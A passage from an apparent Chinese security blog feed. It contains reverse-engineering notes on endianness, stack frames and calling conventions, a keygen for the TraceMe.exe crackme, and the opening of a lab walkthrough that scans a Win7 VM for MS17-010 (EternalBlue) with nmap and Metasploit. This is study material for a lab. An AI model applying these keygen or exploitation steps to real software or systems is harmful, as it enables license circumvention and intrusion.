class="meta-keyword">include</span><span class="meta-string">"windows.h"</span></span></span><br><span class="line">BYTE b=<span class="number">0x12</span>; </span><br><span class="line">WORD w=<span class="number">0x1234</span>;</span><br><span class="line">DWORD dw=<span class="number">0x123456</span>; </span><br><span class="line"><span class="keyword">char</span> str[]=<span class="string">"abcde"</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">byte lb=b;</span><br><span class="line"> WORD lw=w;</span><br><span class="line"> DWORD ldw=dw;</span><br><span class="line"> <span class="keyword">char</span> *lstr=str;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><h3 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h3><p><strong>小端序( Littie endian)</strong>:低地址存放低字节,高地址存放高字节,符合人类思维(地址0x100处,存储整数0x01234567)</p><table><thead><tr><th>地址</th><th>…</th><th>0x100</th><th>0x101</th><th>0x102</th><th>0x103</th><th>…</th></tr></thead><tbody><tr><td>值</td><td>…</td><td>0x67</td><td>0x45</td><td>0x23</td><td>0x01</td><td>…</td></tr></tbody></table><p><strong>大端序(Big endian)</strong>:低地址存放高字节,高地址存放低字节</p><table><thead><tr><th>地址</th><th>…</th><th>0x100</th><th>0x101</th><th>0x102</th><th>0x103</th><th>…</th></tr></thead><tbody><tr><td>值</td><td>…</td><td>0x01</td><td>0x23</td><td>0x45</td><td>0x67</td><td>…</td></tr></tbody></table><p>+++</p><h3 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h3><table><thead><tr><th>TYPE</th><th>Name</th><th>SIZE</th><th>大端序类型</th><th>小端序类型</th></tr></thead><tbody><tr><td>BYTE</td><td>b</td><td>1</td><td><a href="()">12</a></td><td><a href="()">12</a></td></tr><tr><td>WORD</td><td>w</td><td>2</td><td><a href="()">12</a> <a href="()">34</a></td><td><a href="()">34</a> <a href="()">12</a></td></tr><tr><td>DWORD</td><td>dw</td><td>4</td><td><a href="()">12</a> <a href="()">34</a> [56] [78]</td><td>[78] [56] <a href="()">34</a> <a href="()">12</a></td></tr><tr><td>char[]</td><td>str</td><td>6</td><td>[61] [62] [63] [64] [65] [00]</td><td>[61] [62] [63] [64] [65] [00]</td></tr></tbody></table><blockquote><ul><li><p>对于char[]字符数组,在内存中连续,不管大端序还是小端序,存储顺序都是一样的</p></li><li><p>x86系列CPU是小端序;</p></li><li><p>PowerPC是大端序;</p></li><li><p>网络协议也采用大端序(大端序也称网络字节序)</p></li></ul></blockquote><p>+++</p><h3 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h3><blockquote><p>环境:x32dbg</p></blockquote><p>main函数汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwPYQ.png" alt="YBwPYQ.png"><br>程序执行至<strong>0x4013EB</strong> <code>leave</code>时的程序栈:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwpTS.png" alt="YBwpTS.png"><br>相应的函数栈帧:</p><table><thead><tr><th><strong>ESP</strong></th><th>0022FF40</th><th>00401920</th></tr></thead><tbody><tr><td><strong>lstr地址</strong></td><td><strong>0022FF44</strong></td><td><strong>00402008</strong></td></tr><tr><td><strong>ldw</strong></td><td><strong>0022FF48</strong></td><td><strong>00123456</strong></td></tr><tr><td><strong>b和w</strong></td><td><strong>0022FF4C</strong></td><td><strong>12FD1234</strong></td></tr><tr><td></td><td><strong>0022FF50</strong></td><td><strong>0000000A</strong></td></tr><tr><td></td><td><strong>0022FF54</strong></td><td><strong>00000002</strong></td></tr><tr><td><strong>EBP</strong></td><td><strong>0022FF58</strong></td><td><strong>0022FFF0</strong></td></tr><tr><td><strong>返回地址</strong></td><td><strong>0022FF5C</strong></td><td><strong>004010FD</strong></td></tr></tbody></table><p>寄存器状态,<code>EAX=0</code>表示<code>return 0</code>语句</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwiWj.png" alt="YBwiWj.png"><br>+++</p><h2 id="程序二、栈的脏数据"><a href="#程序二、栈的脏数据" class="headerlink" title="程序二、栈的脏数据"></a>程序二、栈的脏数据</h2><h3 id="程序源码-1"><a href="#程序源码-1" class="headerlink" title="程序源码"></a>程序源码</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">f1</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">int</span> a=<span class="number">1</span>,b=<span class="number">2</span>,c=<span class="number">3</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">f2</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">int</span> a,b,c;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"a=%d,b=%d,c=%d\n"</span>,a,b,c);</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line">f1();</span><br><span class="line">f2();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++<br>[3]:()<br><img src="https://s1.ax1x.com/2020/05/14/YBwCFg.png" alt="YBwCFg.png"></p><p>+++</p><h3 id="补充-1"><a href="#补充-1" class="headerlink" title="补充"></a>补充</h3><p>函数栈退出以后,原有栈空间里的局部变量<strong>不会</strong>被自动清除,成为栈的<strong>噪音</strong>或<strong>脏数据</strong>。<br>+++</p><h3 id="调试-1"><a href="#调试-1" class="headerlink" title="调试"></a>调试</h3><blockquote><p>环境:x32dbg</p></blockquote><p><strong>f1(),f2()</strong>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwkSs.png" alt="YBwkSs.png"><br>当程序执行至<strong>0x4013CB</strong> <code>leave</code>(<strong>f1()</strong>函数对应参数均已入栈)时,对应栈布局:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwSw8.png" alt="YBwSw8.png"><br>相应的函数栈帧:</p><table><thead><tr><th><strong>ESP</strong></th><th>0022FF38</th><th>0022FFF0</th></tr></thead><tbody><tr><td><strong>c</strong></td><td><strong>0022FF3C</strong></td><td><strong>00000003</strong></td></tr><tr><td><strong>b</strong></td><td><strong>0022FF40</strong></td><td><strong>00000002</strong></td></tr><tr><td><strong>a</strong></td><td><strong>0022FF44</strong></td><td><strong>00000001</strong></td></tr><tr><td><strong>EBP</strong></td><td><strong>0022FF48</strong></td><td><strong>0022FF58</strong></td></tr><tr><td><strong>返回地址</strong></td><td><strong>0022FF4C</strong></td><td><strong>00401406</strong></td></tr></tbody></table><p>当程序运行至0x4013F4(f2()函数参数均已入栈)时,此时栈布局:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwAln.png" alt="YBwAln.png"><br>对应的函数栈帧:</p><table><thead><tr><th>ESP(printf第一个参数)</th><th>0022FF20</th><th>00403064</th></tr></thead><tbody><tr><td><strong>f2 a</strong></td><td><strong>0022FF24</strong></td><td><strong>00000003</strong></td></tr><tr><td><strong>f2 b</strong></td><td><strong>0022FF28</strong></td><td><strong>0022FFF0</strong></td></tr><tr><td><strong>f2 c</strong></td><td><strong>0022FF2C</strong></td><td><strong>00401950</strong></td></tr><tr><td></td><td><strong>0022FF30</strong></td><td><strong>77C04E42</strong></td></tr><tr><td></td><td><strong>0022FF34</strong></td><td><strong>00401950</strong></td></tr><tr><td></td><td><strong>0022FF38</strong></td><td><strong>0022FFF0</strong></td></tr><tr><td><strong>f1 c</strong></td><td><strong>0022FF3C</strong></td><td><strong>00000003</strong></td></tr><tr><td><strong>f1 b</strong></td><td><strong>0022FF40</strong></td><td><strong>00000002</strong></td></tr><tr><td><strong>f1 a</strong></td><td><strong>0022FF44</strong></td><td><strong>00000001</strong></td></tr><tr><td><strong>EBP</strong></td><td><strong>0022FF48</strong></td><td><strong>0022FF58</strong></td></tr><tr><td><strong>返回地址</strong></td><td><strong>0022FF4C</strong></td><td><strong>0040140B</strong></td></tr></tbody></table><p>+++</p><h2 id="程序三、关于AT-amp-T和Intel"><a href="#程序三、关于AT-amp-T和Intel" class="headerlink" title="程序三、关于AT&T和Intel"></a>程序三、关于AT&T和Intel</h2><h3 id="程序源码-2"><a href="#程序源码-2" class="headerlink" title="程序源码"></a>程序源码</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> i;</span><br><span class="line"><span class="keyword">for</span>(i=<span class="number">0</span>;i<<span class="number">10</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Hello,World\n"</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>在kali里创建test0.c文件;</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwEyq.png" alt="YBwEyq.png"></p><h3 id="AT-amp-T语法"><a href="#AT-amp-T语法" class="headerlink" title="AT&T语法"></a>AT&T语法</h3><p><img src="https://s1.ax1x.com/2020/05/14/YBwemV.png" alt="YBwemV.png"></p><h3 id="Intel语法"><a href="#Intel语法" class="headerlink" title="Intel语法"></a>Intel语法</h3><p><img src="https://s1.ax1x.com/2020/05/14/YBwVO0.png" alt="YBwVO0.png"><br>+++</p><h2 id="程序四、linux下64,32"><a href="#程序四、linux下64,32" class="headerlink" title="程序四、linux下64,32"></a>程序四、linux下64,32</h2><h3 id="程序源码-3"><a href="#程序源码-3" class="headerlink" title="程序源码"></a>程序源码</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test_function</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b,<span class="keyword">int</span> c,<span class="keyword">int</span> d)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> flag;</span><br><span class="line"><span class="keyword">char</span> buffer[<span class="number">10</span>];</span><br><span class="line">flag=<span class="number">31337</span>;</span><br><span class="line">buffer[<span class="number">0</span>]=<span class="string">'A'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">test_function(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>64位版本,可看出<strong>main</strong>函数中1,2,3,4分别存储在寄存器<strong>edi,esi,edx,ecx</strong>中;<strong>test_function</strong>函数中通过上述四个寄存器将值存储在栈中;</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiGxP.png" alt="YDiGxP.png"><br>[11]:()<br><img src="https://s1.ax1x.com/2020/05/14/YDi82t.png" alt="YDi82t.png"><br>+++</p><p>执行至<strong>0x55555555515b</strong>处,即test_function函数;</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiYKf.png" alt="YDiYKf.png"><br>进入test_function函数内部;</p><p><a href="https://imgchr.com/i/YDiBPs" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/05/14/YDiBPs.png" alt="YDiBPs.png"></a><br>执行至<strong>pop</strong>操作处:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiNqS.png" alt="YDiNqS.png"><br>此时的栈:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiaVg.png" alt="YDiaVg.png"><br>对应的栈帧如下表:</p><table><thead><tr><th>rsp</th><th>e1b0</th><th>0x00007fffffffe1c0</th></tr></thead><tbody><tr><td></td><td><strong>e1c0</strong></td><td><strong>0x0000555555555170</strong></td></tr><tr><td><strong>最后一字节为buffer<a href="()">0</a></strong></td><td><strong>e1d0</strong></td><td><strong>0x0000000000000000</strong></td></tr><tr><td></td><td><strong>e1e0</strong></td><td><strong>0x0000000100040000</strong></td></tr><tr><td><strong>rbp</strong></td><td><strong>e1f0</strong></td><td><strong>0x0000000000000000</strong></td></tr></tbody></table><p>+++</p><h2 id="程序5、TraceMe-exe"><a href="#程序5、TraceMe-exe" class="headerlink" title="程序5、TraceMe.exe"></a>程序5、TraceMe.exe</h2><h3 id="汇编代码"><a href="#汇编代码" class="headerlink" title="汇编代码"></a>汇编代码</h3><p>根据<strong>GetDlgItemTextA</strong>函数找到程序的关键代码处:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDi38I.png" alt="YDi38I.png"><br>输入用户名1234567,序列号08173144;</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiw5j.png" alt="YDiw5j.png"><br>发现eax保存序列号长度,ebx保存用户名长度:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDidaQ.png" alt="YDidaQ.png"><br>test al,al判断用户名第一字节是否为空,空的话跳转。</p><p>分析后得知0X0040138F为跳转判断是否输入正确,如下代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcgC6.png" alt="YDcgC6.png"><br>可以直接按照00401347——00401378写出注册机;</p><p>+++</p><p>序列号生成算法:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><iostream></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">char</span> s[<span class="number">15</span>];</span><br><span class="line"><span class="built_in">cin</span>>>s;</span><br><span class="line"><span class="keyword">char</span> arr[]={<span class="number">0x0c</span>,<span class="number">0x0a</span>,<span class="number">0x13</span>,<span class="number">0x09</span>,<span class="number">0x0c</span>,<span class="number">0x0b</span>,<span class="number">0x0a</span>,<span class="number">0x0b</span>};</span><br><span class="line"><span class="keyword">int</span> r=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">int</span> i=<span class="number">3</span>,j=<span class="number">0</span>;j<len;i++,j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(j><span class="number">7</span>)</span><br><span class="line">j=<span class="number">0</span>;</span><br><span class="line">r+=s[i]*arr[j];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<r;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>还是以用户名1234567,得到序列号:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcsER.png" alt="YDcsER.png"><br>Check:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDchKe.png" alt="YDchKe.png"><br>成功!</p><p>+++</p><h2 id="程序六、调用stdcall、fastcall…"><a href="#程序六、调用stdcall、fastcall…" class="headerlink" title="程序六、调用stdcall、fastcall…"></a>程序六、调用<code>stdcall</code>、<code>fastcall</code>…</h2><h3 id="1-stdcall"><a href="#1-stdcall" class="headerlink" title="1.stdcall"></a>1.stdcall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">stdcall <span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><blockquote><p>x32dbg</p></blockquote><p><img src="https://s1.ax1x.com/2020/05/14/YDcyU1.png" alt="YDcyU1.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc64x.png" alt="YDc64x.png"></p><h3 id="2-fastcall"><a href="#2-fastcall" class="headerlink" title="2.fastcall"></a>2.fastcall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcRgO.png" alt="YDcRgO.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcWvD.png" alt="YDcWvD.png"><br>+++</p><h3 id="3-cdecl"><a href="#3-cdecl" class="headerlink" title="3.cdecl"></a>3.cdecl</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">cdecl <span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc4DH.png" alt="YDc4DH.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcDb9.png" alt="YDcDb9.png"><br>+++</p><h3 id="4-thiscall"><a href="#4-thiscall" class="headerlink" title="4.thiscall"></a>4.thiscall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CSum</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> a+b;</span><br><span class="line">}</span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">CSum sum;</span><br><span class="line">sum.Add(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc28K.png" alt="YDc28K.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YD7pCQ.png" alt="YD7pCQ.png"><br>+++</p><h3 id="5-64位操作系统"><a href="#5-64位操作系统" class="headerlink" title="5.64位操作系统"></a>5.64位操作系统</h3><p>示例代码:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> n1,<span class="keyword">int</span> n2,<span class="keyword">int</span> n3,<span class="keyword">int</span> n4,<span class="keyword">int</span> n5,<span class="keyword">int</span> n6)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> n1+n2+n3+n4+n5+n6;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%d\r\n"</span>,Add(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>));</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>Main函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTLut.png" alt="YDTLut.png"></p><p>Add函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTz4g.png" alt="YDTz4g.png"></p><p>+++</p><h3 id="6-64位gcc"><a href="#6-64位gcc" class="headerlink" title="6.64位gcc"></a>6.64位gcc</h3><p>main函数,6个参数从左向右放入寄存器:<strong>rdi,rsi,rdx,rcx,r8,r9</strong></p><p><img src="https://s1.ax1x.com/2020/05/14/YDTvE8.png" alt="YDTvE8.png"></p><p>Add函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTxUS.png" alt="YDTxUS.png"></p><h3 id="7-虚函数调用"><a href="#7-虚函数调用" class="headerlink" title="7.虚函数调用"></a>7.虚函数调用</h3><p>实例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CSum</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line"><span class="function"><span class="keyword">virtual</span> <span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> a+b;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">virtual</span> <span class="keyword">int</span> <span class="title">Sub</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">return</span> a-b;</span><br><span class="line"> }</span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> CSum* pCSum=<span class="keyword">new</span> CSum;</span><br><span class="line"> pCSum->Add(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line"> pCSum->Sub(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>Main函数汇编:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTXHf.png" alt="YDTXHf.png"></p>]]></content>
<summary type="html">
<h2 id="程序一、字节序"><a href="#程序一、字节序" class="headerlink" title="程序一、字节序"></a>程序一、字节序</h2><h3 id="程序源码"><a href="#程序源码" class="headerlink" titl
</summary>
<category term="逆向" scheme="https://singlemindedt.github.io/tags/%E9%80%86%E5%90%91/"/>
</entry>
<entry>
<title>利用永恒之蓝获取meterpretershell</title>
<link href="https://singlemindedt.github.io/2020/05/10/%E5%88%A9%E7%94%A8%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E8%8E%B7%E5%8F%96meterpretershell/"/>
<id>https://singlemindedt.github.io/2020/05/10/利用永恒之蓝获取meterpretershell/</id>
<published>2020-05-10T11:49:35.000Z</published>
<updated>2020-05-11T08:24:25.408Z</updated>
<content type="html"><![CDATA[<p><strong>实验环境:</strong></p><p>攻击机:Kali(192.168.40.128)</p><p>靶机:Win7(192.168.40.142)</p><p>+++</p><p><strong>攻击过程:</strong></p><ol><li>开启msf</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeXoq.png" alt="YJeXoq.png"></p><ol start="2"><li>情报搜集,首先确定目标是否开放445端口,漏洞Ms17-010是否存在</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap探测主机信息:nmap -sV 192.168.40.142</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeOwn.png" alt="YJeOwn.png"></p><p>445端口开放,目的主机为windows7系统,推测存在ms17-010漏洞;</p><ol start="3"><li>利用msf的辅助模块auxiliary进行漏洞验证</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search ms17-010</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJexYV.png" alt="YJexYV.png"></p><p>搜索相关漏洞模块得到5条结果,有远程Windows命令执行、远程Windows内核损坏、代码执行等,此处使用<code>auxiliary/scanner/smb/smb_ms17_010</code> 进行验证;</p><p>配置基本信息:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line"><span class="built_in">set</span> rhost 192.168.40.142</span><br><span class="line"><span class="built_in">set</span> rport 445</span><br></pre></td></tr></table></figure><p>运行探测漏洞是否存在:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJebLj.png" 